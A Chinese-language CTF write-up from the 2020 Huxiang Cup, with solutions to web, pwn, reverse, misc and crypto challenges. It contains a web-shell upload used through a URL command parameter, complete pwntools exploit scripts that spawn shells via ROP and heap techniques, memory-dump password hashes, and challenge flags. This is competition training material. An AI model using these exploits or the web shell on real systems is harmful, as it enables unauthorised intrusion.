2020湖湘杯部分WriteUp
the_one 1263天前Web
1、题目名字不重要反正题挺简单的
http://ip.55:53001/?file=phpinfo
给 phpinfo 还把 flag 放在变量里可还行
DASCTF{9ef7f60bdddfb4671bb6e6cc77dcc0c5}
4、NewWebsite
AWD 的题,直接找简单洞就行了
http://ip:54500/?r=content&cid=15
注入可以跑,但是表里找了一圈没 flag
http://ip:54500/admin/?r=index#
admin/admin 进后台
http://ip:54500/admin/?r=imageset
图片上传,php3 phtml 什么的都行
http://ip:54500//upload/watermark/36921604228866.phtml?911=cat%20/flag
DASCTF{716e7efa46a724eaedacf019682b02ca}
Pwn
1、pwn_printf
第九个参数为 read 参数,要求 0x20 得大小,存在栈溢出
第一 leak 出 libc 返回到 read 函数
第二次 getshell
from pwn import *
import time
context.log_level ='debug'
sh =remote('ip',56806)
elf =ELF('./pwn_printf')
puts_plt=elf.plt['puts']
puts_got=elf.got['puts']
libc = ELF('./libc6_2.23-0ubuntu11.2_amd64.so')
main = 0x4007ef
pop_rdi =0x0000000000401213
sh.recvuntil("You will find this game very interesting\n")
for i in range(15):
sh.sendline(str(0x20))
time.sleep(0.1)
sh.sendline(str(0x20))
sh.sendline(p64(0x0000000000603028+0x10068)+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(0x401172))
libc_addr =u64(sh.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-libc.symbols['puts']
log.info('libc'+hex(libc_addr))
sh.sendline(8*'a'+p64(pop_rdi)+p64(libc_addr+libc.search("/bin/sh").next())+p64(libc_addr+libc.symbols['system'])+p64(0x401172))
sh.interactive()
flag DASCTF{67f3a3150ca23790e1f83ac28bc739be}
2、blend_pwn
标准 菜单堆题
存在字符串格式化漏洞 leak libc 地址
写入 cat flag
通过 666 拿到 flag
from pwn import*
context.log_level ='debug'
#p = process('./blend_pwn')
p =remote('ip',53204)
elf=ELF('./blend_pwn')
def showneme():
p.sendlineafter('>','1')
def add(note):
p.sendlineafter('>','2')
p.sendlineafter('note:',note)
def free(idx):
p.sendlineafter('>','3')
p.sendlineafter('>',str(idx))
def show():
p.sendlineafter('>','4')
p.sendline("%p%p")
showneme()
p.recvuntil("0x")
stack_addr = int(p.recv(12),16)
p.recvuntil("0x")
libc_base = int(p.recv(12),16)-0x3c6780
og = [0x45226,0x4527a,0xf0364,0xf1207]
one = libc_base+og[0]
add(p64(0)*3+p64(one))
add("a"*0x60)
free(0)
free(1)
show()
p.recvuntil("2:")
heap_base = u64(p.recvuntil("\n")[:-1].ljust(8,"\x00"))
p.sendline("666")
p.recv()
p.sendline("A"*0x20+p64(heap_base+0x20)+'A'+'catflag')
p.interactive()
flag:831a8e502383f4f3dd5ce63db9846f68
4、babyheap
又是一个菜单堆题 增删改查
Show 功能存在越界读
打 free hook 为 system
输入/bin/sh getshell
from pwn import *
path = './babyheap'
context.log_level = True
libc=ELF('libc.so.6')
#p =process(path,env={"LD_PRELOAD":"libc.so.6"})
p = remote(ip, 51503)
def add():
p.recvuntil(">>")
p.sendline("1")
def edit(id,size,data):
p.recvuntil(">>")
p.sendline("3")
p.recvuntil("index?\n")
p.sendline(str(id))
p.recvuntil("Size:\n")
p.sendline(str(size))
p.recvuntil("Content:\n")
p.send(str(data))
def show(id):
p.recvuntil(">>")
p.sendline("2")
p.recvuntil("index?\n")
p.sendline(str(id))
def delete(id):
p.recvuntil(">>")
p.sendline("4")
p.recvuntil("index?\n")
p.sendline(str(id))
show(-7)
base=u64(p.recv(6).ljust(8,'\x00'))-8
for i in range(8):
add()
for i in range(8):
delete(7-i)
for i in range(8):
add()
edit(7,0xf0,'aaaaaaaa')
show(7)
p.recvuntil('a'*8)
leak=u64(p.recv(6).ljust(8,'\x00'))
print hex(leak)
libcbase=leak-(0x7ffff7dcfca0-0x00007ffff79e4000)
show(0)
heap=u64(p.recv(6).ljust(8,'\x00'))-0x460
for i in range(3):
add()
delete(8)
delete(9)
delete(10)
delete(3)
delete(4)
delete(5)
delete(6)
delete(7)
for i in range(8):
add()
payload=p64(heap+0x250)*2
edit(10,0xf8,payload)
for i in range(7):
delete(i+1)
delete(0)
for i in range(7):
add()
add()
delete(0)
delete(1)
delete(7)
free=libcbase+libc.sym['__free_hook']
edit(10,8,p64(free))
add()
add()
system=libcbase+libc.sym['system']
edit(1,8,p64(system))
edit(2,8,'/bin/sh\x00')
delete(2)
p.interactive()
Re
1、easyZ
target_arr = []
with open('extract1.txt','r') as f:
for line in f:
target_arr.append(line.split(" ")[2:6])
# print(target_arr)
tmp_arr = []
for j in range(8):
tmp_arr+= target_arr[j]
#print(tmp_arr)
target_arr = [int(num,16) fornum in tmp_arr]
print(target_arr)
with open('extract.txt','r') as f:
init_arr = []
for line in f:
init_arr.append(line.split(" ")[2:6])
# print(init_arr)
true_arr = []
for i in range(3):
tmp_arr= []
for j inrange(8):
tmp_arr += init_arr[i * 8 + j]
true_arr.append(tmp_arr)
print(true_arr)
final_arr = []
for row in true_arr:
final_arr.append([int(num,16) for num in row])
print(final_arr)
res = ''
for i in range(32):
for gcin "0123456789abcdef":
if (ord(gc) * ord(gc)) * final_arr[0][i] + final_arr[1][i] * ord(gc) +final_arr[2][i] == target_arr[i]:
res += gc
print(gc)
print(res)
flag:8eb5d8b632dae2a5167e3e1c4884eef9
2、easyre
没啥好说的一道题,ida 打开有点乱,动态调试
爆破可得,flag 是输入的,所以逆算法
手动汇编转 C 嘛,难度不大,因为追了一遍发觉算法简单
然后发觉我不会逆这个算法,卡了半个多钟有余,然后就突然想到这就是解方程,z3 上去即可
from z3 import *
length = 0x18
input = [BitVec('u%d'%i,32) for i inrange(0,length)]
solver = Solver()
#solver.add(117 * input[0]*117 == ans[0])
List = [0x2B,0x08,0xA9,0xC8,0x97,0x2F,0xFF,0x8C,0x92,0xF0,0xA3,0x89,0xF7,0x26,0x07,0xA4,0xDA,0xEA,0xB3,0x91,0xEF,0xDC,0x95,0xAB]
temp = input[0] & 0xE0
for i in range(0x17):
solver.add( (( (input[i] <<0x3) | (input[i+1] >> 0x5) )& 0xff )^ i == List[i] )
solver.add((((temp)>>0x5)|(input[0x17]<<0x3))&0xFF== List[0x17])
# input[0x17]= input[0x17] << 0x3
# temp = temp >> 0x5
# input[0x17] = (input[0x17] | temp) & 0xFF
print(solver)
for i in range(length):
solver.add(input[i] < 255)
solver.add(input[i] > 0)
solver.check()
result = solver.model()
print(result)
flag = ''
for i in range(0,0x18):
flag +=chr(result[input[i]].as_long().real)
print(flag)
flag:ea5yre_1s_50_ea5y_t0_y0u
3、ReMe
经典的exe2py 题目,本来用个 exe2py 项目转的,奈何转不了,自己将解包后 struct 头替换掉原来的 ReMe 的头,用 uncompyle6 即可拿到源码
拿到源码后,懒得看代码逆向了,发觉可以爆破
二话不说开始爆破
# uncompyle6 version 3.7.4
# Python bytecode 3.7 (3394)
# Decompiled from: Python 3.8.5 (default, Aug 2 2020, 15:09:07)
# [GCC 10.2.0]
# Embedded file name: ReMe.py
import sys, hashlib
check = [
'e5438e78ec1de10a2693f9cffb930d23',
'08e8e8855af8ea652df54845d21b9d67',
'a905095f0d801abd5865d649a646b397',
'bac8510b0902185146c838cdf8ead8e0',
'f26f009a6dc171e0ca7a4a770fecd326',
'cffd0b9d37e7187483dc8dd19f4a8fa8',
'4cb467175ab6763a9867b9ed694a2780',
'8e50684ac9ef90dfdc6b2e75f2e23741',
'cffd0b9d37e7187483dc8dd19f4a8fa8',
'fd311e9877c3db59027597352999e91f',
'49733de19d912d4ad559736b1ae418a7',
'7fb523b42413495cc4e610456d1f1c84',
'8e50684ac9ef90dfdc6b2e75f2e23741',
'acb465dc618e6754de2193bf0410aafe',
'bc52c927138231e29e0b05419e741902',
'515b7eceeb8f22b53575afec4123e878',
'451660d67c64da6de6fadc66079e1d8a',
'8e50684ac9ef90dfdc6b2e75f2e23741',
'fe86104ce1853cb140b7ec0412d93837',
'acb465dc618e6754de2193bf0410aafe',
'c2bab7ea31577b955e2c2cac680fb2f4',
'8e50684ac9ef90dfdc6b2e75f2e23741',
'f077b3a47c09b44d7077877a5aff3699',
'620741f57e7fafe43216d6aa51666f1d',
'9e3b206e50925792c3234036de6a25ab',
'49733de19d912d4ad559736b1ae418a7',
'874992ac91866ce1430687aa9f7121fc']
def func(num):
result = []
while num != 1:
num = num * 3 + 1 ifnum % 2 else num // 2
result.append(num)
return result
if __name__ == '__main__':
inp = [10]*27
if len(inp) != 27:
print('length error!')
sys.exit(-1)
flag = ''
for i, ch in enumerate(inp):
for each_num inrange(30,128):
ret_list= func(each_num)
print(ret_list)
s = ''
for idxin range(len(ret_list)):
s += str(ret_list[idx])
s += str(ret_list[(len(ret_list) - idx - 1)])
print(s)
print("-------------------")
md5 =hashlib.md5()
md5.update(s.encode('utf-8'))
ifmd5.hexdigest() != check[i]:
continue
else:
flag += chr(each_num)
print(flag)
break
inp = flag
md5 = hashlib.md5()
md5.update(inp.encode('utf-8'))
print('You win!')
print('flag{' + md5.hexdigest() +'}')
# okay decompiling ReMe1.pyc
flag:flag{0584cfa2ce502951ef5606f6b99fc921}
4、easy_c++
送分题,直接异或得到结果
result = '7d21e<e3<:3;9;ji tr#w"$*{*+*$|,'
flag = ''
for i in range(32):
flag += chr(ord(result[i])^i)
print(flag)
flag:7e02a9c4439056df0e2a7b432b0069b3
Misc
1、颜文字之谜
流量包 导出 http 对象
打开 html 文件 查看源代码 发现一段base64 编码
解码出颜文字
base64 隐写
def get_base64_diff_value(s1, s2):
base64chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
res = 0
for i in xrange(len(s2)):
if s1[i] != s2[i]:
return abs(base64chars.index(s1[i]) - base64chars.index(s2[i]))
return res
def solve_stego():
with open('1.txt', 'rb') as f:
file_lines = f.readlines()
bin_str = ''
for line in file_lines:
steg_line = line.replace('\n', '')
norm_line = line.replace('\n', '').decode('base64').encode('base64').replace('\n', '')
diff = get_base64_diff_value(steg_line, norm_line)
print diff
pads_num = steg_line.count('=')
if diff:
bin_str += bin(diff)[2:].zfill(pads_num * 2)
else:
bin_str += '0' * pads_num * 2
print goflag(bin_str)
def goflag(bin_str):
res_str = ''
for i in xrange(0, len(bin_str), 8):
res_str += chr(int(bin_str[i:i + 8], 2))
return res_str
if __name__ == '__main__' :
solve_stego()
flag:67b33e39b5105fb4a2953a0ce79c3378
2、passwd
we need sha1(password)!!!附件下载链接: https://pan.baidu.com/s/1vXUF3Fdvz9Wj4vEJwQdAow 提取码:****
imageinfo 拿到模板
volatility -f WIN-BU6IJ7FI9RU-20190927-152050.raw--profile=Win7SP1x86 hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
CTF:1000:aad3b435b51404eeaad3b435b51404ee:0a640404b5c386ab12092587fe19cd02:::
解出 CTF 用户 NTLM hash,qwer1234
sha1 编码:c0206653cd8308cd738f0c69c7d84ba2
3、虚实之间
winhex 修复压缩包,拖出 mingwen - 副本.txt
明显的明文攻击,但是试了很久 ARCHPR 都报错出不了。。。
换成 AZPR_4.0,然后压缩成 zip,跑出密码 123%asd!O
解压得到 ffd5e341le25b2dcab15cbb}gc3bc5b{789b51
根据提示,栅栏 5 格
flag{febc7d2138555b9ebccb32b554dbb11c}
4、隐藏的秘密
重命名成了 a.vmem,imageinfo 拿到模板后
volatility -f a.vmem --profile=Win2003SP2x86hashdump
出来一堆用户名还以为出问题了,后来看了好久 notepad 的进程也没啥东西
队友死马当成活马医,把所有的 ntlm hash 复制出来,放到 cmd5 批量解密
解出来的值 md5 后,放到平台上暴力尝试了 用户名/ 密码 / 用户名和密码
最终发现 FHREhpe$:NIAIWOMA 这个隐藏用户对了,什么鬼脑洞题
8cf1d5b00c27cb8284bce9ccecb09fb7
Crypto
1、LFSXOR
参考: https://blog.csdn.net/qq_37672864/article/details/102519409
from pylfsr import LFSR
import itertools
import re
def xor(a, b):
returnstr(chr(a ^ b)).encode('l1')
def encode(content, key):
tmp = b''
for i inrange(len(content)):
tmp+= xor(content[i], key[i % len(key)])
returntmp
enc1 =b'\xbb\xd3\x08\x15\xc6:\x08\xb2\xb2\x9f\xe4p\xc7\xec\x7f\xfd)\xf6f\x9c\xe4\xd12\xaeJ\x81\xb1\x88\xab\xa5V\xa9\x88\x14\xdf`~\xf6\xdbJ\xb4\x06S!0\xbb\xe4\x1a\xe6R\x8e\x84X\x19K\x95\x07C\xe8\xb2\'\xa9\x80\x15\xec\x8f\x8dY\nK\x85\x99\xb7!\x134\xa9\xb6\x15\xcf&\r\x9b\xe1\x99\xe4]3h~\xf0\xa9\xa5\x14\xee}\xd19l\x14h\x07v*a0\x12\x14\xfe\x0f\x05\xdem\x1d\xe4s2J\x7f\xc28\xf6RR\x8e\xba\xb2m\x18M\xf1\xef!4\x17\xa8\xb4\x14\xc2\x8f\xb9Y:K\xaa\x06T!\x1b\xbb\xfd\xf6Gv\x8e\x9a\xeb\xd9K\xbb\x06N\x9a\x82c\xa9\xa0\x14\xed!\x04\xdbm\x13\xe5w3B\x7f\xd0\xa9\xbf\xb7\x9c\xe3\xd00\x83K\x86\xab3\x7f\xc1\xbb\xfd\x11\x15\xdf\x8e\x80Y\x07\xd8\xe5]2m\xe9\xbb\xce`\x91o\x8f\x8cY!\x81\xe4J\x92\x8c\xa7T\x16E\x15\xf1WMY(\xb8[\x8e2y~\xcbM\x10\x15\xc7\x1fWY\x0cK\x87\xce\xe5!b\xa8\x83\x14\xec6\xd1!\xc8\x905\xe52L\xf1\xba\xcf\n\x9d\x9d\xe7u\xadm\x06\xe4n2r\xd8\xba\xed\xf6\x7f\x9d\xd8\xd02m\x12G\x07Y\x89\x7f\xc0\xa8\xa4\x15\xe5\x043Y\x1eJ\xae\x07n\x94\x87\xbb\xcf_\x8d\x9d\xd1\x14Y,\x9e\xe5b\xd7\x8c\x7f\xf7\xa8\x8f\x14\xc7\x8f\xb3\xb6\xf1\x93\xe4O\xdd\xc4\xdb\xba\xf6!\x15\xfd.\xd1\x18\xcf\xf6\x03\xea2E\x7f\xe1\xa9\xa5\xfe\x9d\xc9\xd1;\xd9\xee\x05\x06z\xc8\xb2\xbb\xe2\xf7{JW4\xcdm\x1a\xe5U\x8d\x0f&\x14\x7f\xf6\x9d\xd4E\xbf\xc3\xdb\xe4L\xe1\xf7\x90\xbb\xdaZ\xf4\x9d\xd13\xb8m3\xe2D3o~\xf8H\xf6U*\x07lY\x03K\xab\x07~\xa3\x87\xbb\xc9\xf7sAQ\x08Y6J\x86\x07Y\xec\xf7\xbb\xc6s\x15\xc6\x7fEY\x02J\x95\x07Z\x11\xbb\xc6T\x15\xfc-\xd0\x06\xe6\x9f-\x07^ \x15\xbb\xccz\x14\xf3\x8f\x97\xd4l9t\x85\xe8\x8a\xbe\xbb\xf9\xf6f\x9d\xf2\xd19\xa2K\xb6\xcd\xcf\xf6~\xd5\xa9\xaa\x15\xd8\x8e\xb3\x81m9\xe4f\xb2!\x1e\xba\xd8s\xfd\x11\x08W\xa1l;\x01\x07_!\x11\xbb\xdd\xf6x\x9d\xf0\x17Y\x15\xfe\x02\xc7\xa0!.W\xa9\xa5\x8f\x9c\xe8\xd1\x12m\x04\xe5s3Q~\xdd\xa9\xa3\x15\xdb\x8f\xac\xaf\xec\xbb\x10\xde2_\xba\xba\xe8\xf6f.\x1e\xd1\x17l\x06\xe4U\xdd\xf0\xd6~\x0fA\x14\xcb\x8e\xb0Y\x1fJ\xb2\xe4\xb3!"\xba\xfeU\x14\xedY\xd0>l-~\x06P1\xbb\xf2\xf6waD\xd1(m\x12`\x06@\xb6~\xfa\xa9\xb1\xb0\x9d\xfb\x18\xfbm&\xe4v2w\xce\xba\xcbo\xd5\x07\x11QX<J\xbd\xb22O\x7f\xd8x>\xc8\x9c\xd3\xd03\x9d\xb5\x1e\xd72S\xf2ry\xf1W\x9c\xc89Y\rK\x8f\xff\x8a\xe0\xb5{\xa9\xae\xb1\x9d\xdd\xd1=\xbeK\xa3\x06e!\x08\xba\xd2\xf6j\x9c\xf6\xd0\x0fl#\xe5o\xf5\xaa~\xc2\xa9\x99\x15\xea6\xd1:\xe7\xa8\xe4n\xbb\nV\xa9\x91\x14\xf9}\xd0!m/\xe5|2o\x81\xba\xf8\r\x14\xeb\tR\xc9\xec\xdd`\xbf\xc6\x81\xdfKXW\xb3o.%\xa9\xcd\xb9\x14\xfd\x97\x83\x8eO\n\x03\xb6iuu\xab\x9d\xbc\x15\xf4\xc3\xd6\xc1'
flag = b'DASCTF{'
print(len(enc1))
for start in range(770, 771):
print(start)
key_char= []
key_index= []
for i inrange(7):
char= xor(enc1[i + start], flag[i])
key_char.append(char[0])
index= (i + start) % 15
key_index.append(index)
for x initertools.product([1, 0], repeat=4):
print(x)
L4 =LFSR(fpoly=[4, 3], initstate=list(x))
data= L4.runFullCycle()
k4 =''
for _in range(len(data)):
a= ''
for _ in range(8):
a += str(L4.next())
k4 += chr(int(a, 2))
is_match = True
forchar in key_char:
if chr(char) not in k4:
is_match = False
break
ifis_match:
print('match')
#print(key_char)
#print(key_index)
else:
continue
k4 =[ord(k) for k in k4]
k4 =list(set(k4) - set(key_char))
for yin itertools.permutations(k4, len(k4)):
key = (''.join([chr(_) for _ in y])).encode('l1')
key = key[:5] + (''.join([chr(_) for _ in key_char])).encode('l1') +key[5: 8]
content = encode(enc1, key)[770:].decode('l1')
if re.match(r'DASCTF\{[0-9a-f]{32}\}', content):
print(content)
exit()
flag:7cc33bd1c63b029fa25a6a78f1253024
2、古典美++
https://github.com/atomcated/Vigenere
https://atomcated.github.io/Vigenere/
得到密钥 ordeyby,全大写 md5
c82bbc1ac4ab644c0aa81980ed2eb25b
3、简单的密码 3
5dd56e94dc11423e8bdb36b5d87a0
本文为白帽汇原创文章,如需转载请注明来源:https://nosec.org/home/detail/4599.html
评论正在提交,请稍等...
最新评论